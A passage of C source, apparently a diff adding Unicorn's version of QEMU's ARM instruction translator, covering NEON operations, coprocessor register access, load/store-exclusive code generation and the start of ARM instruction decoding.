get_fpstatus_ptr(s, 1); + gen_helper_recpe_u32(tcg_ctx, tmp, tmp, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VRSQRTE: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_rsqrte_u32(tcg_ctx, tmp, tmp, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VRECPE_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_recpe_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VRSQRTE_F: + { + TCGv_ptr fpstatus = get_fpstatus_ptr(s, 1); + gen_helper_rsqrte_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_F0s, fpstatus); + tcg_temp_free_ptr(tcg_ctx, fpstatus); + break; + } + case NEON_2RM_VCVT_FS: /* VCVT.F32.S32 */ + gen_vfp_sito(s, 0, 1); + break; + case NEON_2RM_VCVT_FU: /* VCVT.F32.U32 */ + gen_vfp_uito(s, 0, 
1); + break; + case NEON_2RM_VCVT_SF: /* VCVT.S32.F32 */ + gen_vfp_tosiz(s, 0, 1); + break; + case NEON_2RM_VCVT_UF: /* VCVT.U32.F32 */ + gen_vfp_touiz(s, 0, 1); + break; + default: + /* Reserved op values were caught by the + * neon_2rm_sizes[] check earlier. + */ + abort(); + } + if (neon_2rm_is_float_op(op)) { + tcg_gen_st_f32(tcg_ctx, tcg_ctx->cpu_F0s, tcg_ctx->cpu_env, + neon_reg_offset(rd, pass)); + } else { + neon_store_reg(tcg_ctx, rd, pass, tmp); + } + } + break; + } + } else if ((insn & (1 << 10)) == 0) { + /* VTBL, VTBX. */ + int n = ((insn >> 8) & 3) + 1; + if ((rn + n) > 32) { + /* This is UNPREDICTABLE; we choose to UNDEF to avoid the + * helper function running off the end of the register file. + */ + return 1; + } + n <<= 3; + if (insn & (1 << 6)) { + tmp = neon_load_reg(tcg_ctx, rd, 0); + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } + tmp2 = neon_load_reg(tcg_ctx, rm, 0); + tmp4 = tcg_const_i32(tcg_ctx, rn); + tmp5 = tcg_const_i32(tcg_ctx, n); + gen_helper_neon_tbl(tcg_ctx, tmp2, tcg_ctx->cpu_env, tmp2, tmp, tmp4, tmp5); + tcg_temp_free_i32(tcg_ctx, tmp); + if (insn & (1 << 6)) { + tmp = neon_load_reg(tcg_ctx, rd, 1); + } else { + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, 0); + } + tmp3 = neon_load_reg(tcg_ctx, rm, 1); + gen_helper_neon_tbl(tcg_ctx, tmp3, tcg_ctx->cpu_env, tmp3, tmp, tmp4, tmp5); + tcg_temp_free_i32(tcg_ctx, tmp5); + tcg_temp_free_i32(tcg_ctx, tmp4); + neon_store_reg(tcg_ctx, rd, 0, tmp2); + neon_store_reg(tcg_ctx, rd, 1, tmp3); + tcg_temp_free_i32(tcg_ctx, tmp); + } else if ((insn & 0x380) == 0) { + /* VDUP */ + if ((insn & (7 << 16)) == 0 || (q && (rd & 1))) { + return 1; + } + if (insn & (1 << 19)) { + tmp = neon_load_reg(tcg_ctx, rm, 1); + } else { + tmp = neon_load_reg(tcg_ctx, rm, 0); + } + if (insn & (1 << 16)) { + gen_neon_dup_u8(s, tmp, ((insn >> 17) & 3) * 8); + } else if (insn & (1 << 17)) { + if ((insn >> 18) & 1) + gen_neon_dup_high16(s, tmp); + else + 
gen_neon_dup_low16(s, tmp); + } + for (pass = 0; pass < (q ? 4 : 2); pass++) { + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp2, tmp); + neon_store_reg(tcg_ctx, rd, pass, tmp2); + } + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + return 1; + } + } + } + return 0; +} + +static int disas_coproc_insn(DisasContext *s, uint32_t insn) +{ + int cpnum, is64, crn, crm, opc1, opc2, isread, rt, rt2; + const ARMCPRegInfo *ri; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + cpnum = (insn >> 8) & 0xf; + + /* First check for coprocessor space used for XScale/iwMMXt insns */ + if (arm_dc_feature(s, ARM_FEATURE_XSCALE) && (cpnum < 2)) { + if (extract32(s->c15_cpar, cpnum, 1) == 0) { + return 1; + } + if (arm_dc_feature(s, ARM_FEATURE_IWMMXT)) { + return disas_iwmmxt_insn(s, insn); + } else if (arm_dc_feature(s, ARM_FEATURE_XSCALE)) { + return disas_dsp_insn(s, insn); + } + return 1; + } + + /* Otherwise treat as a generic register access */ + is64 = (insn & (1 << 25)) == 0; + if (!is64 && ((insn & (1 << 4)) == 0)) { + /* cdp */ + return 1; + } + + crm = insn & 0xf; + if (is64) { + crn = 0; + opc1 = (insn >> 4) & 0xf; + opc2 = 0; + rt2 = (insn >> 16) & 0xf; + } else { + crn = (insn >> 16) & 0xf; + opc1 = (insn >> 21) & 7; + opc2 = (insn >> 5) & 7; + rt2 = 0; + } + isread = (insn >> 20) & 1; + rt = (insn >> 12) & 0xf; + + ri = get_arm_cp_reginfo(s->cp_regs, + ENCODE_CP_REG(cpnum, is64, crn, crm, opc1, opc2)); + if (ri) { + /* Check access permissions */ + if (!cp_access_ok(s->current_el, ri, isread)) { + return 1; + } + + if (ri->accessfn || + (arm_dc_feature(s, ARM_FEATURE_XSCALE) && cpnum < 14)) { + /* Emit code to perform further access permissions checks at + * runtime; this may result in an exception. + * Note that on XScale all cp0..c13 registers do an access check + * call in order to handle c15_cpar. 
+ */ + TCGv_ptr tmpptr; + TCGv_i32 tcg_syn; + uint32_t syndrome; + + /* Note that since we are an implementation which takes an + * exception on a trapped conditional instruction only if the + * instruction passes its condition code check, we can take + * advantage of the clause in the ARM ARM that allows us to set + * the COND field in the instruction to 0xE in all cases. + * We could fish the actual condition out of the insn (ARM) + * or the condexec bits (Thumb) but it isn't necessary. + */ + switch (cpnum) { + case 14: + if (is64) { + syndrome = syn_cp14_rrt_trap(1, 0xe, opc1, crm, rt, rt2, + isread, s->thumb); + } else { + syndrome = syn_cp14_rt_trap(1, 0xe, opc1, opc2, crn, crm, + rt, isread, s->thumb); + } + break; + case 15: + if (is64) { + syndrome = syn_cp15_rrt_trap(1, 0xe, opc1, crm, rt, rt2, + isread, s->thumb); + } else { + syndrome = syn_cp15_rt_trap(1, 0xe, opc1, opc2, crn, crm, + rt, isread, s->thumb); + } + break; + default: + /* ARMv8 defines that only coprocessors 14 and 15 exist, + * so this can only happen if this is an ARMv7 or earlier CPU, + * in which case the syndrome information won't actually be + * guest visible. 
+ */ + assert(!arm_dc_feature(s, ARM_FEATURE_V8)); + syndrome = syn_uncategorized(); + break; + } + + gen_set_pc_im(s, s->pc); + tmpptr = tcg_const_ptr(tcg_ctx, ri); + tcg_syn = tcg_const_i32(tcg_ctx, syndrome); + gen_helper_access_check_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_syn); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + tcg_temp_free_i32(tcg_ctx, tcg_syn); + } + + /* Handle special cases first */ + switch (ri->type & ~(ARM_CP_FLAG_MASK & ~ARM_CP_SPECIAL)) { + case ARM_CP_NOP: + return 0; + case ARM_CP_WFI: + if (isread) { + return 1; + } + gen_set_pc_im(s, s->pc); + s->is_jmp = DISAS_WFI; + return 0; + default: + break; + } + + if (isread) { + /* Read */ + if (is64) { + TCGv_i64 tmp64; + TCGv_i32 tmp; + if (ri->type & ARM_CP_CONST) { + tmp64 = tcg_const_i64(tcg_ctx, ri->resetvalue); + } else if (ri->readfn) { + TCGv_ptr tmpptr; + tmp64 = tcg_temp_new_i64(tcg_ctx); + tmpptr = tcg_const_ptr(tcg_ctx, ri); + gen_helper_get_cp_reg64(tcg_ctx, tmp64, tcg_ctx->cpu_env, tmpptr); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + } else { + tmp64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_ld_i64(tcg_ctx, tmp64, tcg_ctx->cpu_env, ri->fieldoffset); + } + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + store_reg(s, rt, tmp); + tcg_gen_shri_i64(tcg_ctx, tmp64, tmp64, 32); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, tmp64); + tcg_temp_free_i64(tcg_ctx, tmp64); + store_reg(s, rt2, tmp); + } else { + TCGv_i32 tmp; + if (ri->type & ARM_CP_CONST) { + tmp = tcg_const_i32(tcg_ctx, ri->resetvalue); + } else if (ri->readfn) { + TCGv_ptr tmpptr; + tmp = tcg_temp_new_i32(tcg_ctx); + tmpptr = tcg_const_ptr(tcg_ctx, ri); + gen_helper_get_cp_reg(tcg_ctx, tmp, tcg_ctx->cpu_env, tmpptr); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + } else { + tmp = load_cpu_offset(s->uc, ri->fieldoffset); + } + if (rt == 15) { + /* Destination register of r15 for 32 bit loads sets + * the condition codes from the high 4 bits of the value + */ + gen_set_nzcv(s, 
tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + store_reg(s, rt, tmp); + } + } + } else { + /* Write */ + if (ri->type & ARM_CP_CONST) { + /* If not forbidden by access permissions, treat as WI */ + return 0; + } + + if (is64) { + TCGv_i32 tmplo, tmphi; + TCGv_i64 tmp64 = tcg_temp_new_i64(tcg_ctx); + tmplo = load_reg(s, rt); + tmphi = load_reg(s, rt2); + tcg_gen_concat_i32_i64(tcg_ctx, tmp64, tmplo, tmphi); + tcg_temp_free_i32(tcg_ctx, tmplo); + tcg_temp_free_i32(tcg_ctx, tmphi); + if (ri->writefn) { + TCGv_ptr tmpptr = tcg_const_ptr(tcg_ctx, ri); + gen_helper_set_cp_reg64(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tmp64); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + } else { + tcg_gen_st_i64(tcg_ctx, tmp64, tcg_ctx->cpu_env, ri->fieldoffset); + } + tcg_temp_free_i64(tcg_ctx, tmp64); + } else { + if (ri->writefn) { + TCGv_i32 tmp; + TCGv_ptr tmpptr; + tmp = load_reg(s, rt); + tmpptr = tcg_const_ptr(tcg_ctx, ri); + gen_helper_set_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tmp); + tcg_temp_free_ptr(tcg_ctx, tmpptr); + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + TCGv_i32 tmp = load_reg(s, rt); + store_cpu_offset(tcg_ctx, tmp, ri->fieldoffset); + } + } + } + + if (!isread && !(ri->type & ARM_CP_SUPPRESS_TB_END)) { + /* We default to ending the TB on a coprocessor register write, + * but allow this to be suppressed by the register definition + * (usually only necessary to work around guest bugs). + */ + gen_lookup_tb(s); + } + + return 0; + } + + /* Unknown register; this might be a guest error or a QEMU + * unimplemented feature. + */ + if (is64) { + qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch32 " + "64 bit system register cp:%d opc1: %d crm:%d\n", + isread ? "read" : "write", cpnum, opc1, crm); + } else { + qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch32 " + "system register cp:%d opc1:%d crn:%d crm:%d opc2:%d\n", + isread ? "read" : "write", cpnum, opc1, crn, crm, opc2); + } + + return 1; +} + + +/* Store a 64-bit value to a register pair. 
Clobbers val. */ +static void gen_storeq_reg(DisasContext *s, int rlow, int rhigh, TCGv_i64 val) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 tmp; + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, val); + store_reg(s, rlow, tmp); + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i64(tcg_ctx, val, val, 32); + tcg_gen_trunc_i64_i32(tcg_ctx, tmp, val); + store_reg(s, rhigh, tmp); +} + +/* load a 32-bit value from a register and perform a 64-bit accumulate. */ +static void gen_addq_lo(DisasContext *s, TCGv_i64 val, int rlow) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp; + TCGv_i32 tmp2; + + /* Load value and extend to 64 bits. */ + tmp = tcg_temp_new_i64(tcg_ctx); + tmp2 = load_reg(s, rlow); + tcg_gen_extu_i32_i64(tcg_ctx, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_gen_add_i64(tcg_ctx, val, val, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); +} + +/* load and add a 64-bit value from a register pair. */ +static void gen_addq(DisasContext *s, TCGv_i64 val, int rlow, int rhigh) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp; + TCGv_i32 tmpl; + TCGv_i32 tmph; + + /* Load 64-bit value rd:rn. */ + tmpl = load_reg(s, rlow); + tmph = load_reg(s, rhigh); + tmp = tcg_temp_new_i64(tcg_ctx); + tcg_gen_concat_i32_i64(tcg_ctx, tmp, tmpl, tmph); + tcg_temp_free_i32(tcg_ctx, tmpl); + tcg_temp_free_i32(tcg_ctx, tmph); + tcg_gen_add_i64(tcg_ctx, val, val, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); +} + +/* Set N and Z flags from hi|lo. */ +static void gen_logicq_cc(DisasContext *s, TCGv_i32 lo, TCGv_i32 hi) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_NF, hi); + tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_ZF, lo, hi); +} + +/* Load/Store exclusive instructions are implemented by remembering + the value/address loaded, and seeing if these are the same + when the store is performed. 
   This should be sufficient to implement the architecturally
   mandated semantics, and avoids having to monitor regular stores.

   In system emulation mode only one CPU will be running at once, so
   this sequence is effectively atomic.  In user emulation mode we
   throw an exception and handle the atomic operation elsewhere.  */

/* Generate code for a load-exclusive (LDREX and friends).
 *
 * Loads the value at [addr] into rt (and, for size == 3, the word at
 * [addr + 4] into rt2), and latches the address and the loaded data in
 * cpu_exclusive_addr / cpu_exclusive_val so that a later store-exclusive
 * can verify them.  size is log2 of the access width: 0 = byte,
 * 1 = halfword, 2 = word, 3 = doubleword (rt/rt2 register pair).
 */
static void gen_load_exclusive(DisasContext *s, int rt, int rt2,
                               TCGv_i32 addr, int size)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx);

    /* Mark this TB as containing a load-exclusive. */
    s->is_ldex = true;

    switch (size) {
    case 0:
        gen_aa32_ld8u(s, tmp, addr, get_mem_index(s));
        break;
    case 1:
        gen_aa32_ld16u(s, tmp, addr, get_mem_index(s));
        break;
    case 2:
    case 3:
        /* For size == 3 this is only the low word; the high word is
         * loaded separately below.
         */
        gen_aa32_ld32u(s, tmp, addr, get_mem_index(s));
        break;
    default:
        abort();
    }

    if (size == 3) {
        TCGv_i32 tmp2 = tcg_temp_new_i32(tcg_ctx);
        TCGv_i32 tmp3 = tcg_temp_new_i32(tcg_ctx);

        /* Load the high word from [addr + 4] and record the full 64-bit
         * value in cpu_exclusive_val.
         */
        tcg_gen_addi_i32(tcg_ctx, tmp2, addr, 4);
        gen_aa32_ld32u(s, tmp3, tmp2, get_mem_index(s));
        tcg_temp_free_i32(tcg_ctx, tmp2);
        tcg_gen_concat_i32_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, tmp, tmp3);
        store_reg(s, rt2, tmp3);
    } else {
        tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_exclusive_val, tmp);
    }

    store_reg(s, rt, tmp);
    /* Arm the exclusive monitor on this address. */
    tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, addr);
}

/* Generate code for CLREX: disarm the exclusive monitor by setting
 * cpu_exclusive_addr to -1, which can never match a real address.
 */
static void gen_clrex(DisasContext *s)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1);
}

#ifdef CONFIG_USER_ONLY
/* User-mode store-exclusive: record the address and pack the operand
 * registers and size into cpu_exclusive_info, then raise EXCP_STREX so
 * the operation is completed outside generated code.
 */
static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2,
                                TCGv_i32 addr, int size)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    tcg_gen_extu_i32_i64(tcg_ctx, cpu_exclusive_test, addr);
    tcg_gen_movi_i32(tcg_ctx, cpu_exclusive_info,
                     size | (rd << 4) | (rt << 8) | (rt2 << 12));
    gen_exception_internal_insn(s, 4, EXCP_STREX);
}
#else
/* System-mode store-exclusive (STREX and friends).
 *
 * The re-load-and-compare sequence below is not atomic, but that is
 * acceptable because only one CPU runs at a time in system emulation
 * (see the comment at the top of this section).  rd receives 0 on
 * success and 1 on failure, as the architecture requires.
 */
static void gen_store_exclusive(DisasContext *s, int rd, int rt, int rt2,
                                TCGv_i32 addr, int size)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tmp;
    TCGv_i64 val64, extaddr;
    int done_label;
    int fail_label;

    /* if (env->exclusive_addr == addr && env->exclusive_val == [addr]) {
         [addr] = {Rt};
         {Rd} = 0;
       } else {
         {Rd} = 1;
       } */
    fail_label = gen_new_label(tcg_ctx);
    done_label = gen_new_label(tcg_ctx);
    extaddr = tcg_temp_new_i64(tcg_ctx);
    tcg_gen_extu_i32_i64(tcg_ctx, extaddr, addr);
    /* Fail immediately if the monitor is armed on a different address. */
    tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, extaddr, tcg_ctx->cpu_exclusive_addr, fail_label);
    tcg_temp_free_i64(tcg_ctx, extaddr);

    /* Re-load the current memory contents at [addr] ... */
    tmp = tcg_temp_new_i32(tcg_ctx);
    switch (size) {
    case 0:
        gen_aa32_ld8u(s, tmp, addr, get_mem_index(s));
        break;
    case 1:
        gen_aa32_ld16u(s, tmp, addr, get_mem_index(s));
        break;
    case 2:
    case 3:
        gen_aa32_ld32u(s, tmp, addr, get_mem_index(s));
        break;
    default:
        abort();
    }

    val64 = tcg_temp_new_i64(tcg_ctx);
    if (size == 3) {
        TCGv_i32 tmp2 = tcg_temp_new_i32(tcg_ctx);
        TCGv_i32 tmp3 = tcg_temp_new_i32(tcg_ctx);
        tcg_gen_addi_i32(tcg_ctx, tmp2, addr, 4);
        gen_aa32_ld32u(s, tmp3, tmp2, get_mem_index(s));
        tcg_temp_free_i32(tcg_ctx, tmp2);
        tcg_gen_concat_i32_i64(tcg_ctx, val64, tmp, tmp3);
        tcg_temp_free_i32(tcg_ctx, tmp3);
    } else {
        tcg_gen_extu_i32_i64(tcg_ctx, val64, tmp);
    }
    tcg_temp_free_i32(tcg_ctx, tmp);

    /* ... and fail if they no longer match the value latched at
     * load-exclusive time.
     */
    tcg_gen_brcond_i64(tcg_ctx, TCG_COND_NE, val64, tcg_ctx->cpu_exclusive_val, fail_label);
    tcg_temp_free_i64(tcg_ctx, val64);

    /* Monitor check passed: perform the store. */
    tmp = load_reg(s, rt);
    switch (size) {
    case 0:
        gen_aa32_st8(s, tmp, addr, get_mem_index(s));
        break;
    case 1:
        gen_aa32_st16(s, tmp, addr, get_mem_index(s));
        break;
    case 2:
    case 3:
        gen_aa32_st32(s, tmp, addr, get_mem_index(s));
        break;
    default:
        abort();
    }
    tcg_temp_free_i32(tcg_ctx, tmp);
    if (size == 3) {
        /* Second word of a doubleword store. */
        tcg_gen_addi_i32(tcg_ctx, addr, addr, 4);
        tmp = load_reg(s, rt2);
        gen_aa32_st32(s, tmp, addr, get_mem_index(s));
        tcg_temp_free_i32(tcg_ctx, tmp);
    }
    tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[rd], 0);
    tcg_gen_br(tcg_ctx, done_label);

    gen_set_label(tcg_ctx, fail_label);
    tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_R[rd], 1);
    gen_set_label(tcg_ctx, done_label);
    /* Either way, the exclusive access disarms the monitor. */
    tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1);
}
#endif

/* gen_srs:
 * @env: CPUARMState
 * @s: DisasContext
 * @mode: mode field from insn (which stack to store to)
 * @amode: addressing mode (DA/IA/DB/IB), encoded as per P,U bits in ARM insn
 * @writeback: true if writeback bit set
 *
 * Generate code for the SRS (Store Return State) insn, which stores
 * LR and SPSR (two words) to the banked r13 of the given mode.
 */
static void gen_srs(DisasContext *s,
                    uint32_t mode, uint32_t amode, bool writeback)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int32_t offset;
    TCGv_i32 addr = tcg_temp_new_i32(tcg_ctx);
    TCGv_i32 tmp = tcg_const_i32(tcg_ctx, mode);
    /* Fetch the banked SP (r13) of the target mode. */
    gen_helper_get_r13_banked(tcg_ctx, addr, tcg_ctx->cpu_env, tmp);
    tcg_temp_free_i32(tcg_ctx, tmp);
    /* Pre-adjust the address for the two-word transfer. */
    switch (amode) {
    case 0: /* DA */
        offset = -4;
        break;
    case 1: /* IA */
        offset = 0;
        break;
    case 2: /* DB */
        offset = -8;
        break;
    case 3: /* IB */
        offset = 4;
        break;
    default:
        abort();
    }
    tcg_gen_addi_i32(tcg_ctx, addr, addr, offset);
    /* Store LR, then SPSR at the next word. */
    tmp = load_reg(s, 14);
    gen_aa32_st32(s, tmp, addr, get_mem_index(s));
    tcg_temp_free_i32(tcg_ctx, tmp);
    tmp = load_cpu_field(s->uc, spsr);
    tcg_gen_addi_i32(tcg_ctx, addr, addr, 4);
    gen_aa32_st32(s, tmp, addr, get_mem_index(s));
    tcg_temp_free_i32(tcg_ctx, tmp);
    if (writeback) {
        /* Adjust back from the post-store address to the final base
         * value for the chosen addressing mode, then write it to the
         * banked SP.
         */
        switch (amode) {
        case 0:
            offset = -8;
            break;
        case 1:
            offset = 4;
            break;
        case 2:
            offset = -4;
            break;
        case 3:
            offset = 0;
            break;
        default:
            abort();
        }
        tcg_gen_addi_i32(tcg_ctx, addr, addr, offset);
        tmp = tcg_const_i32(tcg_ctx, mode);
        gen_helper_set_r13_banked(tcg_ctx, tcg_ctx->cpu_env, tmp, addr);
        tcg_temp_free_i32(tcg_ctx, tmp);
    }
    tcg_temp_free_i32(tcg_ctx, addr);
}

/* Decode and translate one 32-bit ARM-mode instruction.
 * (Body continues beyond this excerpt.)
 */
static void disas_arm_insn(DisasContext *s, unsigned int insn) // qq
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    unsigned int cond, val, op1, i, shift, rm, rs, rn, rd, sh;
    TCGv_i32
tmp; + TCGv_i32 tmp2; + TCGv_i32 tmp3; + TCGv_i32 addr; + TCGv_i64 tmp64; + + /* M variants do not implement ARM mode. */ + if (arm_dc_feature(s, ARM_FEATURE_M)) { + goto illegal_op; + } + + // Unicorn: trace this instruction on request + if (HOOK_EXISTS_BOUNDED(s->uc, UC_HOOK_CODE, s->pc - 4)) { + gen_uc_tracecode(tcg_ctx, 4, UC_HOOK_CODE_IDX, s->uc, s->pc - 4); + // the callback might want to stop emulation immediately + check_exit_request(tcg_ctx); + } + + cond = insn >> 28; + if (cond == 0xf){ + /* In ARMv3 and v4 the NV condition is UNPREDICTABLE; we + * choose to UNDEF. In ARMv5 and above the space is used + * for miscellaneous unconditional instructions. + */ + ARCH(5); + + /* Unconditional instructions. */ + if (((insn >> 25) & 7) == 1) { + /* NEON Data processing. */ + if (!arm_dc_feature(s, ARM_FEATURE_NEON)) { + goto illegal_op; + } + + if (disas_neon_data_insn(s, insn)) { + goto illegal_op; + } + return; + } + if ((insn & 0x0f100000) == 0x04000000) { + /* NEON load/store. */ + if (!arm_dc_feature(s, ARM_FEATURE_NEON)) { + goto illegal_op; + } + + if (disas_neon_ls_insn(s, insn)) { + goto illegal_op; + } + return; + } + if ((insn & 0x0f000e10) == 0x0e000a00) { + /* VFP. 
*/ + if (disas_vfp_insn(s, insn)) { + goto illegal_op; + } + return; + } + if (((insn & 0x0f30f000) == 0x0510f000) || + ((insn & 0x0f30f010) == 0x0710f000)) { + if ((insn & (1 << 22)) == 0) { + /* PLDW; v7MP */ + if (!arm_dc_feature(s, ARM_FEATURE_V7MP)) { + goto illegal_op; + } + } + /* Otherwise PLD; v5TE+ */ + ARCH(5TE); + return; + } + if (((insn & 0x0f70f000) == 0x0450f000) || + ((insn & 0x0f70f010) == 0x0650f000)) { + ARCH(7); + return; /* PLI; V7 */ + } + if (((insn & 0x0f700000) == 0x04100000) || + ((insn & 0x0f700010) == 0x06100000)) { + if (!arm_dc_feature(s, ARM_FEATURE_V7MP)) { + goto illegal_op; + } + return; /* v7MP: Unallocated memory hint: must NOP */ + } + + if ((insn & 0x0ffffdff) == 0x01010000) { + ARCH(6); + /* setend */ + if (((insn >> 9) & 1) != s->bswap_code) { + /* Dynamic endianness switching not implemented. */ + qemu_log_mask(LOG_UNIMP, "arm: unimplemented setend\n"); + goto illegal_op; + } + return; + } else if ((insn & 0x0fffff00) == 0x057ff000) { + switch ((insn >> 4) & 0xf) { + case 1: /* clrex */ + ARCH(6K); + gen_clrex(s); + return; + case 4: /* dsb */ + case 5: /* dmb */ + case 6: /* isb */ + ARCH(7); + /* We don't emulate caches so these are a no-op. */ + return; + default: + goto illegal_op; + } + } else if ((insn & 0x0e5fffe0) == 0x084d0500) { + /* srs */ + if (IS_USER(s)) { + goto illegal_op; + } + ARCH(6); + gen_srs(s, (insn & 0x1f), (insn >> 23) & 3, insn & (1 << 21)); + return; + } else if ((insn & 0x0e50ffe0) == 0x08100a00) { + /* rfe */ + int32_t offset; + if (IS_USER(s)) + goto illegal_op; + ARCH(6); + rn = (insn >> 16) & 0xf; + addr = load_reg(s, rn); + i = (insn >> 23) & 3; + switch (i) { + case 0: offset = -4; break; /* DA */ + case 1: offset = 0; break; /* IA */ + case 2: offset = -8; break; /* DB */ + case 3: offset = 4; break; /* IB */ + default: abort(); + } + if (offset) + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + /* Load PC into tmp and CPSR into tmp2. 
*/ + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 4); + tmp2 = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp2, addr, get_mem_index(s)); + if (insn & (1 << 21)) { + /* Base writeback. */ + switch (i) { + case 0: offset = -8; break; + case 1: offset = 4; break; + case 2: offset = -4; break; + case 3: offset = 0; break; + default: abort(); + } + if (offset) + tcg_gen_addi_i32(tcg_ctx, addr, addr, offset); + store_reg(s, rn, addr); + } else { + tcg_temp_free_i32(tcg_ctx, addr); + } + gen_rfe(s, tmp, tmp2); + return; + } else if ((insn & 0x0e000000) == 0x0a000000) { + /* branch link and change to thumb (blx ) */ + int32_t offset; + + val = (uint32_t)s->pc; + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, val); + store_reg(s, 14, tmp); + /* Sign-extend the 24-bit offset */ + offset = ((int32_t)(insn << 8)) >> 8; + /* offset * 4 + bit24 * 2 + (thumb bit) */ + val += (((uint32_t)offset) << 2) | ((insn >> 23) & 2) | 1; + /* pipeline offset */ + val += 4; + /* protected by ARCH(5); above, near the start of uncond block */ + gen_bx_im(s, val); + return; + } else if ((insn & 0x0e000f00) == 0x0c000100) { + if (arm_dc_feature(s, ARM_FEATURE_IWMMXT)) { + /* iWMMXt register transfer. */ + if (extract32(s->c15_cpar, 1, 1)) { + if (!disas_iwmmxt_insn(s, insn)) { + return; + } + } + } + } else if ((insn & 0x0fe00000) == 0x0c400000) { + /* Coprocessor double register transfer. */ + ARCH(5TE); + } else if ((insn & 0x0f000010) == 0x0e000010) { + /* Additional coprocessor register transfer. 
*/ + } else if ((insn & 0x0ff10020) == 0x01000000) { + uint32_t mask; + uint32_t val; + /* cps (privileged) */ + if (IS_USER(s)) + return; + mask = val = 0; + if (insn & (1 << 19)) { + if (insn & (1 << 8)) + mask |= CPSR_A; + if (insn & (1 << 7)) + mask |= CPSR_I; + if (insn & (1 << 6)) + mask |= CPSR_F; + if (insn & (1 << 18)) + val |= mask; + } + if (insn & (1 << 17)) { + mask |= CPSR_M; + val |= (insn & 0x1f); + } + if (mask) { + gen_set_psr_im(s, mask, 0, val); + } + return; + } + goto illegal_op; + } + if (cond != 0xe) { + /* if not always execute, we generate a conditional jump to + next instruction */ + s->condlabel = gen_new_label(tcg_ctx); + arm_gen_test_cc(tcg_ctx, cond ^ 1, s->condlabel); + s->condjmp = 1; + } + if ((insn & 0x0f900000) == 0x03000000) { + if ((insn & (1 << 21)) == 0) { + ARCH(6T2); + rd = (insn >> 12) & 0xf; + val = ((insn >> 4) & 0xf000) | (insn & 0xfff); + if ((insn & (1 << 22)) == 0) { + /* MOVW */ + tmp = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, tmp, val); + } else { + /* MOVT */ + tmp = load_reg(s, rd); + tcg_gen_ext16u_i32(tcg_ctx, tmp, tmp); + tcg_gen_ori_i32(tcg_ctx, tmp, tmp, val << 16); + } + store_reg(s, rd, tmp); + } else { + if (((insn >> 12) & 0xf) != 0xf) + goto illegal_op; + if (((insn >> 16) & 0xf) == 0) { + gen_nop_hint(s, insn & 0xff); + } else { + /* CPSR = immediate */ + val = insn & 0xff; + shift = ((insn >> 